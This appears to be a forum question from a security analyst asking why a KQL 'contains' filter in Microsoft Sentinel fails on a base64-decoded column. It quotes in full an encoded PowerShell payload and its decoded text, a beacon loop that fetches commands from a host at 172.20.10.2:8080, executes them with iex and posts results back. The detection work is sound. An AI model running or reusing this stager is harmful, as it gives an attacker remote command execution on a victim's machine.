I'm having difficulty searching a field for a value in KQL.
The field I am searching I get by decoding a base64 encoded string using the built in function base64_decode_tostring(). The string I am decoding is:
JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=
This String decodes to what I expect in the decodedString Column:
$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
It can be seen here in the results table:

When I try and use a | where decodedString contains "X-92d9-ab61" clause to detect the string value in the decodedString, Sentinel says there are no results. However I can clearly see this string in my decodedString column above.
In fact, the where clause won't detect anything, unless it is a single character included in the decodedString column.
Why will it only detect single characters? Why will it not detect more than a one character string?